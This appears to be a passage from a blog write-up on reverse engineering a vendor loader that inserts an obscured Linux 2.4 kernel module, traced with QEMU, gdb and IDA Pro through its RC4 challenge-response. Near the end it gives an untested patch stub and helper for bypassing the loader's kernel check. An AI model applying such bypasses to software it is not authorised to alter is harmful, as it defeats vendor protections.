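HEADER = bytes.fromhex(
    "3c000000 00000000 901583c8 96050000 "
    "00000000 00000000 00000000 00000000 "
    "00000000 00000000 00000000 401083c8 "
    "00000000 00000000 00000000"
)

header = parse_module_header(HEADER)
for field in FIELDS:
    print("%-15s 0x%08x" % (field + ":", header[field]))
```

The interesting values are name (a pointer just past the code), size (1430 decimal) and init, which is the address we want to break on.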
So, our output in /tmp/module_text starts at 0xc883103c, and is 1430 bytes long. Disassembling the binary dump in /tmp/module_text, looking for the init function pointer that gets called:
[box] $ ndisasm -b 32 -o $((0xc883103c)) /tmp/module_text
...
C8831040  83EC18            sub esp,byte +0x18
C8831043  53                push ebx
C8831044  E8F7040000        call 0xc8831540
C8831049  8D5818            lea ebx,[eax+0x18]
C883104C  C7430400000000    mov dword [ebx+0x4],0x0
C8831053  C7401800000000    mov dword [eax+0x18],0x0
...
By combining the gdb stub functionality of QEMU with a disassembler such as IDA Pro, we can disassemble and follow what is happening when the init code is executed.
Testing our analysis against the init function by setting break points on:
0xc053ffd0
0xc8831040
Just to make sure we catch everything.. I don't expect 0xc053ffd0 to be hit, but it is a valid kernel address :)
Testing the theory out under gdb/qemu doesn't pan out quite as expected:
(gdb) break *0xc053ffd0
Breakpoint 4 at 0xc053ffd0
(gdb) break *0xc8831040
Breakpoint 5 at 0xc8831040
(gdb) c
Continuing.
... Run the loader program ...
Breakpoint 5, 0xc8831040 in ?? ()
(gdb) x/10i $eip
0xc8831040: sub $0x18,%esp
0xc8831043: push %ebx
0xc8831044: call 0xc8831540
0xc8831049: lea 0x18(%eax),%ebx
0xc883104c: movl $0x0,0x4(%ebx)
0xc8831053: movl $0x0,0x18(%eax)
0xc883105a: mov 0xc0252024,%eax
0xc883105f: inc %eax
0xc8831060: mov %eax,0x8(%ebx)
0xc8831063: call 0xc8831090
(gdb) i r ebx
ebx 0xc8831000 -930934784
Now that we're able to trace this code, we should work out what information would be desirable to make this process far easier:
Ideally, I'd love a complete, working System.map, however, looking at the files available, it doesn't appear to be available. Scratching that one off, we get:
Use symbols provided by /proc/ksyms to help our reversing effort. That's a useful start, but provides a limited view of what is available.
Another couple of things we could try to help our reversing efforts:
Compile a custom kernel as similar to theirs as possible, with the same compiler / distro. Once it's been compiled, we can extract function signatures from the vmlinux file, and attempt to apply them to the extracted image.
[box] $ cat /proc/version
Linux version 2.4.31 (build@builder2) (gcc version 2.95.4 20011002 (Debian prerelease)) #1 Fri Aug 10 12:43:55 EEST 2007
After some researching, it was determined that gcc version 2.95.4 20011002 is available from a default install of Debian 3.0r1. I only needed cd1 and cd2 from the set of CDs to install the required tools.
After performing a compile of the default kernel configuration shipped in 2.4.31 sans PCMCIA support, I used the 2pelf tool available here to generate the signatures off the .o files in the linux tree, then used the IDA tool sigmake to generate the signature information. (I love bash scripting to automate these tasks).
If needed, the signatures could be regenerated several times with different compilation parameters in order to increase success of signature matching.
Since it would be helpful to have a full kernel text image in IDA Pro, we can use the memsave function in QEMU to generate an appropriate memory dump. To get the most useful memory dump, I'll generate the dump when qemu has hit the breakpoint on the "qwink" init function.
The vmlinux file generated when I compiled the 2.4.31 kernel indicated that the kernel got loaded at 0xc0100000, so we'll dump from there to 0xd0000000… This actually turned out to be a bad idea, as IDA couldn't analyse such large files. After some experimentation and looking at the output of objdump -fp on the compiled vmlinux file, I dumped from 0xc0100000 to 0xc1000000.
(qemu) memsave 3222274048 15728640 d
*pause*
(qemu)
The first number is 0xc0100000 and the second is 0xc1000000 - 0xc0100000.
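Since memsave takes a start address and a size in decimal here, it's worth letting the computer do the hex arithmetic rather than fat-fingering it. A tiny sketch (memsave_args is just a name I picked; the output file name d is the one used above):

```python
def memsave_args(start, end):
    """Return (start address, byte count) for dumping the range [start, end)."""
    return start, end - start


start, size = memsave_args(0xC0100000, 0xC1000000)
print("memsave %d %d d" % (start, size))
```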
After dumping the kernel memory to disk, then loading it into IDA, and applying the signatures that were generated before, we see a lot of function names pop up. Sometimes they're correct, sometimes they don't appear to be, and sometimes they miss functions we find interesting, but in general they save us a lot of work :)
The init code is as follows from IDA:
seg001:C8831040 module_init_code:
seg001:C8831040 sub esp, 18h
seg001:C8831043 push ebx
seg001:C8831044 call GET_C8831550 ; eax = 0xc8831550
seg001:C8831049 lea ebx, [eax+18h] ; ebx = eax + 0x18 = 0xc8831568, this is struct timer_list data
seg001:C883104C mov dword ptr [ebx+4], 0 ; sets list.prev pointer to null
seg001:C8831053 mov dword ptr [eax+18h], 0 ; sets list.next pointer to null
seg001:C883105A mov eax, ds:jiffies
seg001:C883105F inc eax ; schedules the code to be executed in one jiffie
seg001:C8831060 mov [ebx+8], eax ; sets the scheduler expires
seg001:C8831063 call GET_C88310a0
seg001:C8831068 mov [ebx+10h], eax ; function pointer used (execd_by_timer) below
seg001:C883106B mov eax, 0FFFFE000h
seg001:C8831070 and eax, esp ; get current
seg001:C8831072 mov [ebx+0Ch], eax ; data pointer for call back. current task
seg001:C8831075 add esp, -0Ch ; no idea what it's doing here. possibly aligning stack to paragraph boundary?
seg001:C8831078 mov eax, offset add_timer
seg001:C883107D push ebx ; push offset to struct timer_list data
seg001:C883107E call eax ; add_timer
seg001:C8831080 xor eax, eax ; return 0
seg001:C8831082 add esp, 10h
seg001:C8831085 pop ebx
seg001:C8831086 add esp, 18h
seg001:C8831089 retn
I discovered that the mov eax, offset 0xc011b170 / call eax pair was calling add_timer, based on the string "bug: kernel added timer twice at %p.\n" and then grep'ing the kernel source tree for added timer twice at, which led me to kernel/timer.c.
I discovered 0xc0252024 was the jiffies variable by cross referencing where that variable was used, and looking for some identifiable characteristics. I found what I was looking for with a little bit of reverse engineering, and by cross referencing what was found with the linux kernel code that I had available to identify the variable name.
Cross referencing structures once they were discovered helped things a lot. (For example, the struct timer).
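One idiom in the init code worth spelling out is the mov eax, 0FFFFE000h / and eax, esp pair commented as "get current". On 2.4 i386 kernels the task structure sits at the bottom of the 8 KiB kernel stack, so masking the stack pointer gives you the current task. A small sketch of the arithmetic follows; the esp value used is made up purely for illustration.

```python
THREAD_SIZE = 0x2000  # 8 KiB kernel stack per task on 2.4 i386


def current_from_esp(esp):
    """Round a kernel stack pointer down to the base of its 8 KiB stack."""
    return esp & ~(THREAD_SIZE - 1) & 0xFFFFFFFF


example_esp = 0xC7F5DF80  # hypothetical kernel stack pointer
print("mask    = 0x%08x" % (~(THREAD_SIZE - 1) & 0xFFFFFFFF))
print("current = 0x%08x" % current_from_esp(example_esp))
```

That pointer is what ends up in the data field of the timer, so the callback knows which process to poke at later.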
After following through the code that would be executed by the timer, it appeared to be generating an RC4 key, then generating a 4 byte value, and then calling access_process_vm to write those 4 bytes based on the values passed in. Luckily the function signatures generated earlier identified the access_process_vm function for me, and saved a fair amount of effort.
QEMU's breakpoints come in useful for following this in gdb.
Having a look at the IDA loader binary, we see:
.text:08053DA8 load_module_into_kernel proc near ; CODE XREF: sub_804DD20+25p .text:08053DA8 ; sub_804F572+10Dp ... .text:08053DA8 .text:08053DA8 constructed_image= dword ptr -24h .text:08053DA8 roundup_size = dword ptr -20h .text:08053DA8 start_of_module_data= dword ptr -18h .text:08053DA8 total_size = dword ptr -14h .text:08053DA8 kernel_modified_variable= dword ptr -10h .text:08053DA8 var_C = dword ptr -0Ch .text:08053DA8 tv_usecs_challenge= dword ptr 8 .text:08053DA8 .text:08053DA8 push ebp .text:08053DA9 cld ; clear direction flag .text:08053DAA mov ebp, esp .text:08053DAC push edi .text:08053DAD xor eax, eax .text:08053DAF push esi .text:08053DB0 or ecx, 0FFFFFFFFh .text:08053DB3 push ebx .text:08053DB4 sub esp, 18h .text:08053DB7 mov [ebp+kernel_modified_variable], 0 ; initialise the variable written to by access_process_vm to 0 .text:08053DBE mov edi, module_name .text:08053DC4 mov edx, 10h .text:08053DC9 repne scasb .text:08053DCB mov ebx, ecx .text:08053DCD mov eax, 3Ch .text:08053DD2 not ebx ; embedded strlen() .text:08053DD4 call sub_8053D95 ; calcuate if additional space is needed in a memory copy later on .text:08053DD9 mov [ebp+roundup_size], eax ; save the calcutation for later use .text:08053DDC lea edx, [eax+ebx+1360] ; calcuate total size needed, + 1360 .text:08053DE3 push edx ; size .text:08053DE4 mov [ebp+total_size], edx .text:08053DE7 call _malloc ; allocate the required space .text:08053DEC mov [ebp+constructed_image], eax ; save the results of malloc() .text:08053DEF mov ecx, [ebp+total_size] .text:08053DF2 cld ; clear direction flag .text:08053DF3 mov edi, eax .text:08053DF5 xor eax, eax ; write nulls .text:08053DF7 rep stosb ; embedded memset .text:08053DF9 push 510h ; size_t .text:08053DFE mov edi, [ebp+constructed_image] ; get the allocated memory .text:08053E01 add edi, [ebp+roundup_size] ; move past the module structure .text:08053E04 push offset module_init_code ; void * .text:08053E09 lea edx, [edi+510h] ; edx now points PAST the 
module_init_code and all that .text:08053E0F push edi ; void * .text:08053E10 lea esi, [edi+1360] ; esi = module name pointer .text:08053E16 mov [ebp+start_of_module_data], edx .text:08053E19 call _memcpy ; copy the module_init_code (of length 0x510) .text:08053E19 ; to the allocated memory .text:08053E1E push ebx ; size_t. this is calcuated previously from strlen(module_name) .text:08053E1F push module_name ; void * .text:08053E25 push esi ; points to module name .text:08053E26 call _memcpy ; setup module name .text:08053E2B push [ebp+total_size] ; int .text:08053E2E push module_name ; name .text:08053E34 call create_module .text:08053E39 add esp, 24h .text:08053E3C cmp eax, 0FFFFFFFFh ; eax contains base of the allocated kernel memory .text:08053E3F jnz short loc_8053E48 .text:08053E41 push offset aFailedToCreate ; "failed to create module" .text:08053E46 jmp short loc_8053EC0 .text:08053E48 ; --------------------------------------------------------------------------- .text:08053E48 .text:08053E48 loc_8053E48: ; CODE XREF: load_module_into_kernel+97j .text:08053E48 mov ecx, [ebp+constructed_image] .text:08053E4B mov dword ptr [ecx], 3Ch ; set size of module header to 0x3c .text:08053E51 mov ecx, [ebp+roundup_size] .text:08053E54 lea edx, [eax+ecx] ; edx = start of module code, in kernel space .text:08053E57 mov ecx, [ebp+constructed_image] .text:08053E5A lea eax, [edx+1360] ; eax = end of module code, start of "qwink" .text:08053E60 mov [ecx+2Ch], edx ; set module size .text:08053E63 mov edx, [ebp+tv_usecs_challenge] ; arg_0 = tv.tv_usecs ? 
.text:08053E66 mov [ecx+8], eax ; write the name pointer, points to end of module, "qwink" .text:08053E69 mov eax, [ebp+total_size] .text:08053E6C mov [edi+510h], edx ; write challenge to kernel image (data section) .text:08053E72 mov [ecx+0Ch], eax ; write size of complete module to header .text:08053E75 mov ecx, [ebp+start_of_module_data] .text:08053E78 mov eax, kernel_ptr_c0105000 .text:08053E7D mov [ecx+4], eax .text:08053E80 mov eax, dword_8056A68 ; some mystical value .text:08053E85 mov [ecx+8], eax .text:08053E88 mov eax, dword_8056A6C ; 0x3f .text:08053E8D mov [ecx+0Ch], eax .text:08053E90 lea eax, [ebp+kernel_modified_variable] ; get the address of the variable .text:08053E93 mov [ecx+10h], eax ; variable that is going to be written to .text:08053E96 call alloc_rc4_t .text:08053E9B push [ebp+start_of_module_data] .text:08053E9E mov esi, eax .text:08053EA0 push eax .text:08053EA1 call rc4_init_key_encrypt ; (rc4_t, start_of_module_data) .text:08053EA6 push [ebp+constructed_image] ; image .text:08053EA9 push module_name ; name .text:08053EAF call init_module .text:08053EB4 add esp, 10h .text:08053EB7 test eax, eax .text:08053EB9 jz short loc_8053EC9 .text:08053EBB push offset aFailedToLoadMo ; "failed to load module" .text:08053EC0 .text:08053EC0 loc_8053EC0: ; CODE XREF: load_module_into_kernel+9Ej .text:08053EC0 call _puts .text:08053EC5 xor eax, eax .text:08053EC7 jmp short loc_8053EFE .text:08053EC9 ; --------------------------------------------------------------------------- .text:08053EC9 .text:08053EC9 loc_8053EC9: ; CODE XREF: load_module_into_kernel+111j .text:08053EC9 ; load_module_into_kernel+126_j .text:08053EC9 mov eax, [ebp+kernel_modified_variable] .text:08053ECC test eax, eax .text:08053ECE jz short loc_8053EC9 ; while the variable hasn't been modified, loop. Ugh. 
.text:08053ED0 push offset unk_8056960 ; not sure yet .text:08053ED5 xor ebx, ebx .text:08053ED7 push [ebp+tv_usecs_challenge] ; challenge .text:08053EDA push esi ; rc4 structure, returned from rc4_init .text:08053EDB call check_challenge_response .text:08053EE0 add esp, 0Ch .text:08053EE3 mov edx, [ebp+kernel_modified_variable] .text:08053EE6 push module_name ; name .text:08053EEC cmp edx, eax ; result from check_challenge_response .text:08053EEE setz bl ; set return code if they're the same .text:08053EF1 call delete_module .text:08053EF6 push esi .text:08053EF7 call free_rc4_t_tailcall .text:08053EFC mov eax, ebx ; set return value (based on check_challenge_response) .text:08053EFE .text:08053EFE loc_8053EFE: ; CODE XREF: load_module_into_kernel+11Fj .text:08053EFE lea esp, [ebp-0Ch] .text:08053F01 pop ebx .text:08053F02 pop esi .text:08053F03 pop edi .text:08053F04 pop ebp .text:08053F05 retn .text:08053F05 load_module_into_kernel endp .text:08053F05
.text:08053CEA check_challenge_response proc near ; CODE XREF: load_module_into_kernel+133p
.text:08053CEA
.text:08053CEA local_rc4_structure= dword ptr -14h
.text:08053CEA challenge_copy = dword ptr -10h
.text:08053CEA var_C = dword ptr -0Ch
.text:08053CEA rc4_t = dword ptr 8
.text:08053CEA challenge = dword ptr 0Ch
.text:08053CEA unknown_data = dword ptr 10h
.text:08053CEA
.text:08053CEA push ebp
.text:08053CEB mov ebp, esp
.text:08053CED push edi
.text:08053CEE push esi
.text:08053CEF xor esi, esi
.text:08053CF1 push ebx
.text:08053CF2 push ecx
.text:08053CF3 push ecx
.text:08053CF4 mov edi, [ebp+rc4_t]
.text:08053CF7 mov eax, [ebp+challenge]
.text:08053CFA push edi
.text:08053CFB mov [ebp+challenge_copy], eax
.text:08053CFE call rc4_dup_struct
.text:08053D03 mov [ebp+local_rc4_structure], eax ; duplicated structure
.text:08053D06 mov eax, [ebp+unknown_data]
.text:08053D09 push dword ptr [eax+100h] ; offset in 256 bytes
.text:08053D0F push edi ; rc4 structure passed in
.text:08053D10 call rc4_set_key
.text:08053D15 add esp, 0Ch
.text:08053D18
.text:08053D18 loc_8053D18: ; CODE XREF: check_challenge_response+91j
.text:08053D18 push edi
.text:08053D19 call rc4_get_byte
.text:08053D1E mov edx, [ebp+local_rc4_structure]
.text:08053D21 mov bl, al ; gets a byte from the rc4 structure which was passed in (and initialised later on)
.text:08053D23 mov ecx, esi ; esi is a loop counter
.text:08053D25 and ecx, 3 ; index into key material
.text:08053D28 movzx eax, byte ptr [edx+esi] ; index into the duplicated structure
.text:08053D2C mov edx, [ebp+unknown_data]
.text:08053D2F movzx eax, byte ptr [edx+eax] ; get a byte of the unknown data
.text:08053D33 pop edx ; edx = local rc4 structure
.text:08053D34 mov edx, ebx ; get the byte that was generated via rc4_get_byte
.text:08053D36 and edx, 3 ; perform a switch on the low 2 bits (values 0-3)
.text:08053D39 cmp edx, 1
.text:08053D3C jz short loc_8053D5A
.text:08053D3E jg short loc_8053D46
.text:08053D40 test edx, edx
.text:08053D42 jz short loc_8053D52
.text:08053D44 jmp short loc_8053D74
.text:08053D46 ; ---------------------------------------------------------------------------
.text:08053D46
.text:08053D46 loc_8053D46: ; CODE XREF: check_challenge_response+54j
.text:08053D46 cmp edx, 2
.text:08053D49 jz short loc_8053D62
.text:08053D4B cmp edx, 3
.text:08053D4E jz short loc_8053D6A
.text:08053D50 jmp short loc_8053D74
.text:08053D52 ; ---------------------------------------------------------------------------
.text:08053D52
.text:08053D52 loc_8053D52: ; CODE XREF: check_challenge_response+58j
.text:08053D52 xor al, bl
.text:08053D54 add byte ptr [ebp+ecx+challenge_copy], al
.text:08053D58 jmp short loc_8053D74
.text:08053D5A ; ---------------------------------------------------------------------------
.text:08053D5A
.text:08053D5A loc_8053D5A: ; CODE XREF: check_challenge_response+52j
.text:08053D5A add al, bl
.text:08053D5C xor byte ptr [ebp+ecx+challenge_copy], al
.text:08053D60 jmp short loc_8053D74
.text:08053D62 ; ---------------------------------------------------------------------------
.text:08053D62
.text:08053D62 loc_8053D62: ; CODE XREF: check_challenge_response+5Fj
.text:08053D62 xor bl, byte ptr [ebp+ecx+challenge_copy]
.text:08053D66 add al, bl
.text:08053D68 jmp short loc_8053D70
.text:08053D6A ; ---------------------------------------------------------------------------
.text:08053D6A
.text:08053D6A loc_8053D6A: ; CODE XREF: check_challenge_response+64j
.text:08053D6A add al, byte ptr [ebp+ecx+challenge_copy]
.text:08053D6E xor al, bl
.text:08053D70
.text:08053D70 loc_8053D70: ; CODE XREF: check_challenge_response+7Ej
.text:08053D70 mov byte ptr [ebp+ecx+challenge_copy], al
.text:08053D74
.text:08053D74 loc_8053D74: ; CODE XREF: check_challenge_response+5Aj
.text:08053D74 ; check_challenge_response+66j ...
.text:08053D74 inc esi
.text:08053D75 cmp esi, 100h
.text:08053D7B jnz short loc_8053D18
.text:08053D7D push [ebp+local_rc4_structure]
.text:08053D80 call free_rc4_t_tailcall
.text:08053D85 mov eax, [ebp+challenge_copy]
.text:08053D88 lea esp, [ebp-0Ch]
.text:08053D8B pop ebx
.text:08053D8C or eax, 80000000h ; ret |= 0x80000000l
.text:08053D91 pop esi
.text:08053D92 pop edi
.text:08053D93 pop ebp
.text:08053D94 retn
.text:08053D94 check_challenge_response endp
.text:08053D94
.text:08053D95
.text:08053D95 ; =============== S U B R O U T I N E =======================================
.text:08053D95
.text:08053D95 ; Attributes: bp-based frame
.text:08053D95
.text:08053D95 sub_8053D95 proc near ; CODE XREF: load_module_into_kernel+2Cp
.text:08053D95 push ebp
.text:08053D96 dec edx ; 16 -> 15
.text:08053D97 test eax, edx ; eax = 0x3c
.text:08053D99 mov ebp, esp
.text:08053D9B mov ecx, eax
.text:08053D9D jz short loc_8053DA4
.text:08053D9F or edx, eax
.text:08053DA1 lea ecx, [edx+1]
.text:08053DA4
.text:08053DA4 loc_8053DA4: ; CODE XREF: sub_8053D95+8j
.text:08053DA4 pop ebp
.text:08053DA5 mov eax, ecx
.text:08053DA7 retn
.text:08053DA7 sub_8053D95 endp
.text:08053DA7
.text:08053DA8
.text:08053DA8 ; =============== S U B R O U T I N E =======================================
.text:08053DA8
.text:08053DA8 ; Attributes: bp-based frame
.text:08053DA8
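The byte-mixing loop in check_challenge_response above can be easier to follow in a higher-level form. The following is a rough Python sketch of that loop only, not the loader's actual code. The names mix_challenge, keystream, dup_bytes and table are made up for illustration: keystream stands in for the 256 bytes returned by rc4_get_byte, dup_bytes for the first 256 bytes of the duplicated rc4 structure, and table for the 256 bytes of unknown_data. It also assumes the challenge dword is stored little-endian, as it would be on x86.

```python
def mix_challenge(challenge, keystream, dup_bytes, table):
    """Sketch of the 256-round mixing loop (all parameter names are hypothetical)."""
    c = bytearray(challenge.to_bytes(4, "little"))  # challenge_copy on the stack
    for i in range(256):
        k = keystream[i]         # bl: byte from rc4_get_byte
        j = i & 3                # ecx: which byte of challenge_copy to update
        v = table[dup_bytes[i]]  # al: unknown_data[dup_structure[i]]
        op = k & 3               # switch on the low two bits of the keystream byte
        if op == 0:
            c[j] = (c[j] + (v ^ k)) & 0xFF
        elif op == 1:
            c[j] ^= (v + k) & 0xFF
        elif op == 2:
            c[j] = (v + (k ^ c[j])) & 0xFF
        else:
            c[j] = ((v + c[j]) & 0xFF) ^ k
    # The function sets the top bit of the result before returning it.
    return int.from_bytes(c, "little") | 0x80000000
```

With real inputs, the value returned here would be what gets compared against the variable the kernel module writes back.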
.text:08053BFD rc4_init_key_encrypt proc near ; CODE XREF: load_module_into_kernel+F9p
.text:08053BFD
.text:08053BFD var_8 = dword ptr -8
.text:08053BFD rc4_t = dword ptr 8
.text:08053BFD start_of_module_data= dword ptr 0Ch
.text:08053BFD
.text:08053BFD push ebp
.text:08053BFE mov ebp, esp
.text:08053C00 push esi
.text:08053C01 mov esi, [ebp+rc4_t]
.text:08053C04 push ebx
.text:08053C05 mov ebx, [ebp+start_of_module_data]
.text:08053C08 push esi
.text:08053C09 call init_rc4_t
.text:08053C0E push dword ptr [ebx] ; push the encryption key
.text:08053C10 add ebx, 4 ; move the data along
.text:08053C13 push esi ; push the rc4_t context
.text:08053C14 call rc4_set_key
.text:08053C19 push 1000 ; length
.text:08053C1E push esi ; rc4 structure
.text:08053C1F call rc4_prevent_weak_bytes
.text:08053C24 push 10h ; size
.text:08053C26 push ebx ; data
.text:08053C27 push esi ; rc4 structure
.text:08053C28 call rc4_crypt ; encrypts 16 bytes that go to the kernel module
.text:08053C2D lea esp, [ebp-8]
.text:08053C30 pop ebx
.text:08053C31 pop esi
.text:08053C32 pop ebp
.text:08053C33 retn
.text:08053C33 rc4_init_key_encrypt endp
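The sequence in rc4_init_key_encrypt (set the key, discard 1000 keystream bytes, then encrypt 16 bytes) looks like the common "RC4-drop" pattern. Below is a minimal Python sketch of that pattern, assuming textbook RC4 and assuming the 32-bit key is used as four little-endian bytes. Neither assumption is confirmed by the listing, and the function names are illustrative rather than the loader's own.

```python
def rc4_keystream(key):
    """Textbook RC4: key scheduling followed by an endless keystream generator."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4_drop_crypt(key, data, drop=1000):
    """Discard `drop` keystream bytes (the weak early output), then XOR the data."""
    ks = rc4_keystream(key)
    for _ in range(drop):
        next(ks)
    return bytes(b ^ next(ks) for b in data)


# Assumed key encoding: the first dword of the module data as 4 little-endian bytes.
key = (0x12345678).to_bytes(4, "little")   # placeholder key, not taken from the binary
ciphertext = rc4_drop_crypt(key, bytes(16))  # 16 bytes, as in the rc4_crypt call
```

Since RC4 is a stream cipher, running rc4_drop_crypt again with the same key recovers the original 16 bytes.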
In general, the feeling is that the loader binary tries to ensure it's running on the same kernel the module was written for, because it relies on hard-coded offsets into the kernel data. I was disappointed that the module inserted by the loader binary didn't appear to be malicious.
Bypassing this somewhat artificial restriction is fairly easy. The code written earlier to hook create_module and init_module can be modified to:
xor eax, eax
inc eax
ret
to avoid this restriction. I haven't tested this, but it should work :p
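For reference, that three-instruction stub assembles to four bytes on 32-bit x86 (31 C0 40 C3). The sketch below shows one way such a stub could be written over a copy of a binary image in Python. The helper name patch_stub and the idea of patching at a file offset are assumptions made for illustration, and like the stub itself this is untested against the real loader.

```python
# xor eax, eax ; inc eax ; ret  -> returns 1 in eax
RETURN_ONE_STUB = bytes([0x31, 0xC0, 0x40, 0xC3])


def patch_stub(image, offset, stub=RETURN_ONE_STUB):
    """Return a copy of `image` with `stub` written at `offset` (hypothetical helper)."""
    if offset < 0 or offset + len(stub) > len(image):
        raise ValueError("stub does not fit inside the image at that offset")
    return image[:offset] + stub + image[offset + len(stub):]
```

The offset has to be the file offset of the function being replaced, which is not the same as the virtual address shown in the IDA listings.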
Before we can continue the analysis of the fileman binary, we still need to get the loader binary running. Running strace reveals the current issue with loader:
[box] # LD_LIBRARY_PATH=/lib_mikro strace -f ./loader
execve("./loader", ["./loader"], [/* 15 vars */]) = 0
uname({sys="Linux", node="debian", ...}) = 0
...
[pid 1727] rt_sigaction(SIGSEGV, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] rt_sigaction(SIGILL, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] rt_sigaction(SIGABRT, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] rt_sigaction(SIGBUS, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] rt_sigaction(SIGFPE, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] gettimeofday({1189098093, 745332}, NULL) = 0
[pid 1727] create_module("qwink", 1430) = 0xc8833000
[pid 1727] init_module(0x80553fc, 134587376, umovestr: Input/output error
0x7c) = 0
[pid 1726] waitpid(1727, Process 1726 suspended
<unfinished ...>
[pid 1727] delete_module("qwink") = 0
...
[pid 1727] open("/dev/panics", O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 1727] open("/proc/cmdline", O_RDONLY) = 3
[pid 1727] fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
[pid 1727] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40170000
[pid 1727] read(3, "root=/dev/hda1 ro single\n", 4096) = 25
[pid 1727] close(3) = 0
[pid 1727] munmap(0x40170000, 4096) = 0
[pid 1727] exit_group(1) = ?
It appears some functionality that is provided elsewhere needs to be initialised first.
Having a look at loader in IDA (cross-referencing on /proc/cmdline) indicates that /proc/cmdline must contain MBR= followed by a value that matches %x.
.text:0804DBD4 push offset name ; "/proc/cmdline"
.text:0804DBD9 call _fopen ; open the file, read only
.text:0804DBDE pop ebx
.text:0804DBDF mov esi, eax
.text:0804DBE1 test esi, esi
.text:0804DBE3 pop eax
.text:0804DBE4 jz short loc_804DC34 ; if opening the file failed, jump down to exit(1)
.text:0804DBE6 push esi ; FILE *
.text:0804DBE7 lea ebx, [ebp+var_408]
.text:0804DBED push 1024 ; int
.text:0804DBF2 push ebx ; char *
.text:0804DBF3 call _fgets ; read in 0x400 bytes
.text:0804DBF8 push esi ; FILE *
.text:0804DBF9 call _fclose
.text:0804DBFE push offset aMbr ; "MBR="
.text:0804DC03 push ebx ; char *
.text:0804DC04 call _strstr ; look for MBR= in the string
.text:0804DC09 add esp, 18h
.text:0804DC0C test eax, eax
.text:0804DC0E mov edx, eax
.text:0804DC10 jz short loc_804DC34 ; don't find it, exit out
.text:0804DC12 mov [ebp+var_40C], 0 ; initialise the number read in
.text:0804DC1C lea eax, [ebp+var_40C] ; load the address in
.text:0804DC22 push eax
.text:0804DC23 push offset aMbrX ; "MBR=%x"
.text:0804DC28 push edx ; char *
.text:0804DC29 call _sscanf ; parse the string
.text:0804DC2E add esp, 0Ch
.text:0804DC31 dec eax
.text:0804DC32 jz short loc_804DC3B
.text:0804DC34
.text:0804DC34 loc_804DC34: ; CODE XREF: sub_804DBC4+20j
.text:0804DC34 ; sub_804DBC4+4Cj
.text:0804DC34 push 1 ; status
.text:0804DC36 call _exit
.text:0804DC3B ; ---------------------------------------------
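The check in the listing above amounts to "find MBR= on the kernel command line and parse a hex number after it, otherwise exit(1)". A rough Python equivalent is sketched below. The function name parse_mbr is made up, and the regular expression only approximates what sscanf's %x accepts (for instance it ignores signs and leading whitespace).

```python
import re


def parse_mbr(cmdline):
    """Return the hex value following the first 'MBR=' in cmdline, or None."""
    idx = cmdline.find("MBR=")           # strstr(buf, "MBR=")
    if idx < 0:
        return None                      # the loader would call exit(1) here
    # Approximation of sscanf(p, "MBR=%x", &value): optional 0x prefix, hex digits.
    m = re.match(r"MBR=(?:0[xX])?([0-9a-fA-F]+)", cmdline[idx:])
    if m is None:
        return None                      # sscanf did not convert one item, exit(1)
    return int(m.group(1), 16)


# The command line seen in the strace output has no MBR= entry.
print(parse_mbr("root=/dev/hda1 ro single\n"))
# A command line with MBR=0 appended gets past the check.
print(parse_mbr("root=/dev/hda1 ro single MBR=0\n"))
```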
Looking up information on master boot records (MBR) indicates that the partition table starts at offset 0x1BE within the MBR. However, looking at where the code is called, there is a comparison to see if the value is above a certain size. Restarting with an updated kernel command line containing MBR=0 lets the binary run and listen on a network socket.
This article has shown the use of QEMU with GDB to debug Linux kernel modules, along with static disassembly provided by IDA Pro. It has covered analysing an obscured kernel module that was tightly bound to a specific vendor kernel.
A while ago I accidentally destroyed my previous website content. I've decided to make a new one up, and start afresh, rather than restoring the contents from cached copies.